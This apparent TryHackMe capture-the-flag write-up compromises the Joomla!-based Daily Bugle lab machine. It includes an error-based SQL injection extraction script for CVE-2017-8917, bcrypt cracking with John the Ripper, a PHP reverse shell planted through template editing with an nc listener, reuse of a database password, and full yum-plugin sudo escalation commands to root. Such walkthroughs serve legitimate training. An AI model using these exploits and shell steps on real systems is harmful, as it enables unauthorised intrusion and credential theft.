TryHackMe: Daily Bugle Write-up

Max Register
4 min read, Oct 6, 2021

This Spider-Man themed machine is part of the Offensive Security learning path on tryhackme.com. Follow along as we exploit Joomla! CMS with SQL injection, crack a bcrypt hash with John the Ripper, reuse a database password for a user shell, and abuse a passwordless sudo rule for yum to escalate to root.

Enumeration

First, let's run an Nmap scan with default scripts and version detection, saving the output to a file:

> nmap -sC -sV <TARGET IP> -oN initial.nmap
# Nmap 7.91 scan initiated Tue Oct 5 22:17:37 2021 as: nmap -sC -sV -oN initial.nmap <TARGET IP>
Nmap scan report for <TARGET IP>
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql MariaDB (unauthorized)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 5 22:18:23 2021 -- 1 IP address (1 host up) scanned in 46.00 seconds

Three open ports: SSH (22), an Apache/PHP web server (80), and MariaDB (3306), which rejects unauthenticated connections, so the web application is the obvious way in. Nmap's http-generator script already names Joomla!, and robots.txt lists /administrator/ (the Joomla! admin login) as well as a /joomla/ directory; keep both in mind for later. Browsing to the web server we are greeted with the following Daily Bugle news site:

Daily Bugle Site

The Nmap output strongly suggests Joomla!, but public exploits are version-specific, so we need the exact version. There are several well-known files a Joomla! install leaks it through.

HackerTarget has a post on Joomla! enumeration, so let's use that. One of the files it points to is the English language manifest, which is readable without authentication:

/language/en-GB/en-GB.xml

Going to that page yields the following:

Joomla! 3.7.0

Awesome! We have confirmed that the site runs Joomla! and enumerated its version as 3.7.0. Next, let's see whether there are public exploits for this exact version.
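The version check above is easy to script, which matters when you fingerprint more than one host or want to compare the result against a known-vulnerable release numerically (3.10.x must not sort below 3.7.0). The following is an added example, not code from the write-up or from Joomla!: the manifest is constructed inline to mirror the shape of en-GB.xml so the script runs offline, and fetch_manifest() is an assumed helper for pulling the real file from a live host.

```python
import re
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample shaped like Joomla! 3.x's language manifest; it is not
# the real file from the target. The <version> element is what we are after.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<metafile version="3.7" client="site">
  <name>English (en-GB)</name>
  <version>3.7.0</version>
  <creationDate>April 2017</creationDate>
  <author>Joomla! Project</author>
  <metadata>
    <name>English (United Kingdom)</name>
    <tag>en-GB</tag>
  </metadata>
</metafile>
"""


def parse_version(xml_text):
    """Return the manifest's <version> as a tuple of ints, e.g. (3, 7, 0),
    or None when no version is present. Falls back to a regex when the XML
    is truncated or malformed, which happens with partial downloads."""
    text = ""
    try:
        node = ET.fromstring(xml_text).find("version")
        if node is not None and node.text:
            text = node.text
    except ET.ParseError:
        m = re.search(r"<version>\s*([^<]+?)\s*</version>", xml_text)
        if m:
            text = m.group(1)
    parts = re.findall(r"\d+", text)
    return tuple(int(p) for p in parts) if parts else None


def is_at_most(version, ceiling):
    """True when version <= ceiling, compared component by component as
    integers, so 3.10.2 correctly sorts above 3.7.0 (a plain string
    comparison would get this wrong)."""
    return version <= tuple(int(p) for p in re.findall(r"\d+", ceiling))


def fetch_manifest(base_url, timeout=10):
    """Download the manifest from a live host (assumed helper, not run offline)."""
    url = base_url.rstrip("/") + "/language/en-GB/en-GB.xml"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    v = parse_version(SAMPLE_MANIFEST)
    label = ".".join(map(str, v))
    print("Joomla! " + label + ("  (<= 3.7.0)" if is_at_most(v, "3.7.0") else ""))
```

Against a real target, replace SAMPLE_MANIFEST with fetch_manifest("http://<TARGET IP>/"); if the manifest 404s, the same parser works on any other Joomla! XML manifest that carries a <version> element.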

SQL Injection

Joomla! 3.7.0 is affected by an unauthenticated SQL injection in the com_fields component (CVE-2017-8917): the list[fullordering] parameter ends up in an ORDER BY clause without proper sanitisation. The joomblah.py exploit on GitHub automates it, extracting data through MySQL error messages and dumping the users table. Running it against the target gives us a username and a password hash.
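To show what an exploit like that is actually doing under the hood, here is an added example of the error-based extraction technique it relies on. This is not joomblah.py's code and not part of the write-up: the vulnerable URL shape (com_fields, list[fullordering]) is the published one, but the target address, the row data, the hash, and the jos_ table prefix are constructed (a real run first has to discover the randomised prefix), and the 32-character error window is an assumption about how much of the bad XPath expression MySQL echoes back. mock_send() stands in for the HTTP request so the script runs offline.

```python
import re
import urllib.parse

MARKER = "~"                       # 0x7e, prefixed so the regex only matches our injected text
ERROR_WINDOW = 32                  # chars of the bad XPath MySQL echoes back (assumed limit)
CHUNK = ERROR_WINDOW - len(MARKER)
ERROR_RE = re.compile(r"XPATH syntax error: '([^']*)'")


def build_url(expr, base="http://<TARGET IP>/"):
    """Wrap expr in updatexml() so MySQL raises an XPath error containing the
    expression's result, then drop it into the injectable ORDER BY parameter."""
    sqli = f"updatexml(1,concat(0x7e,({expr})),1)"
    query = urllib.parse.urlencode({
        "option": "com_fields", "view": "fields", "layout": "modal",
        "list[fullordering]": sqli,
    })
    return f"{base}index.php?{query}"


def leak_from_error(html):
    """Return the text echoed in the XPATH error (marker stripped), or None.
    A leaked value containing a single quote would be cut short here."""
    m = ERROR_RE.search(html)
    if m is None or not m.group(1).startswith(MARKER):
        return None
    return m.group(1)[len(MARKER):]


def extract(send, expr):
    """Read a value longer than the error window by slicing it with substr()
    and stitching the slices together; a short slice marks the end."""
    out, start = "", 1
    while True:
        url = build_url(f"substr(({expr}),{start},{CHUNK})")
        piece = leak_from_error(send(url))
        if not piece:
            break
        out += piece
        if len(piece) < CHUNK:
            break
        start += CHUNK
    return out


# ---- constructed mock of the vulnerable page, so this runs offline ----
FAKE_ROWS = [("alice", "$2y$10$constructedfakehashconstructedfakehashconstructedfake")]


def mock_send(url):
    """Emulate MySQL evaluating our substr() over FAKE_ROWS and leaking the
    result in an error page, the way the real target does."""
    params = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    sqli = params["list[fullordering]"][0]
    m = re.search(r"substr\(\((.*)\),(\d+),(\d+)\)", sqli)
    inner, start, length = m.group(1), int(m.group(2)), int(m.group(3))
    value = ":".join(FAKE_ROWS[0]) if "concat(username" in inner else ""
    echoed = (MARKER + value[start - 1:start - 1 + length])[:ERROR_WINDOW]
    return f"<html><body>Error: XPATH syntax error: '{echoed}'</body></html>"


def dump_first_user(send=mock_send):
    """username:bcrypt-hash of the first Joomla! user (jos_ prefix assumed)."""
    return extract(send, "select concat(username,0x3a,password) from jos_users limit 1")


if __name__ == "__main__":
    print(dump_first_user())
```

For a live target, replace mock_send with a function that performs the GET (for example with requests.get) and returns the response body; everything else stays the same. The chunking loop is the part worth understanding: a 60-character bcrypt hash never fits in one error message, so the exploit has to walk it with substr().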

Password Cracking

Great, we now have a username and a password hash. Joomla! 3.x stores passwords as bcrypt ($2y$...), hence --format=bcrypt below. Save the hash to hash.txt and run the classic tool John the Ripper against the rockyou wordlist:

> john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt

bcrypt is deliberately slow to compute, so this takes a while. John prints the password as soon as it finds it; john --show hash.txt displays it again later.

Gaining a Foothold

Log in at /administrator/ with those credentials to reach the Joomla! control panel. Hacking Articles has a post on turning Joomla! admin access into a reverse shell: open the Beez3 template (Extensions > Templates), edit its index.php, and replace the contents with a PHP reverse shell.

Using pentestmonkey's PHP reverse shell, with the IP and port set to our listener

With a listener waiting on the chosen port (for example nc -lvnp <PORT>), save the file and click Template Preview. Rendering the template executes our PHP, and the shell calls back:

initial shell

Privilege Escalation

With a shell as the web server user we can start looking for privilege escalation paths. Joomla!'s main configuration file, /var/www/html/configuration.php, holds the database credentials in plain text.
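Reading configuration.php by hand works for one box, but the same file format comes up on every Joomla! target, so it is worth having a parser that pulls out every string property and flags the credential-bearing ones. This is an added example, not the write-up's or Joomla!'s code: the configuration text is constructed (the values are invented placeholders, not the box's real settings), and the list of property names treated as sensitive is my own choice.

```python
import re

# Constructed stand-in for /var/www/html/configuration.php; the values are
# placeholders, not the target's. Joomla! writes each setting as a public
# property of the JConfig class, with PHP single-quoted string values.
SAMPLE_CONFIG = """<?php
class JConfig {
\tpublic $sitename = 'The Daily Bugle';
\tpublic $MetaDesc = 'Spider-Man\\'s daily news';
\tpublic $dbtype = 'mysqli';
\tpublic $host = 'localhost';
\tpublic $user = 'root';
\tpublic $password = 'ConstructedExampleP4ss';
\tpublic $db = 'joomla';
\tpublic $dbprefix = 'jos_';
\tpublic $secret = 'ConstructedSecretValue';
\tpublic $debug = '0';
}
"""

# public $name = '...';  -- the value may contain \' and \\ escapes, which is
# why the character class alternates between "not quote/backslash" and
# "backslash + any char" instead of a naive [^']*.
PROP_RE = re.compile(r"public\s+\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")

# Property names whose values are credentials or secrets worth reusing/testing.
SENSITIVE = ("user", "password", "secret", "smtpuser", "smtppass", "ftp_user", "ftp_pass")


def _unescape_php_single_quoted(raw):
    """Undo the only two escapes PHP honours inside single quotes: \\' and \\\\."""
    return re.sub(r"\\(['\\])", r"\1", raw)


def parse_jconfig(text):
    """Return {property_name: value} for every string property in the file."""
    return {name: _unescape_php_single_quoted(val) for name, val in PROP_RE.findall(text)}


def credential_findings(cfg):
    """(name, value) pairs for the sensitive properties that are actually set."""
    return [(k, cfg[k]) for k in SENSITIVE if cfg.get(k)]


def reuse_checklist(cfg):
    """Where the recovered database password is worth trying next."""
    return [
        "mysql -h %s -u %s -p   (port 3306 was open in the Nmap scan)" % (cfg.get("host", "?"), cfg.get("user", "?")),
        "su / ssh for each local user with a login shell",
    ]


if __name__ == "__main__":
    cfg = parse_jconfig(SAMPLE_CONFIG)
    for name, value in credential_findings(cfg):
        print("%-10s %s" % (name, value))
    for line in reuse_checklist(cfg):
        print("try:", line)
```

On the box, feed the real file in with parse_jconfig(open("/var/www/html/configuration.php").read()). Note that $secret is the key Joomla! uses for session and token generation; it is not a login password, but it is still a secret worth recording.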

Passwords get reused, so try the database password against jjameson, the only regular user account on the box:

su jjameson

It works! Grab the user flag, then keep looking for a path to root. Checking what jjameson is allowed to run with sudo gives us an option:

sudo -l

jjameson can run yum as root without a password. GTFOBins documents a yum privilege escalation: point yum at a config file that loads plugins from a directory we control, and supply a plugin whose init hook execs a shell. Following its commands yields root.

[jjameson@dailybugle tmp]$ TF=$(mktemp -d)
[jjameson@dailybugle tmp]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle tmp]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# whoami
root

Success, we are root! Grab the root flag and celebrate.

Thank you for reading my writeup, happy hacking!
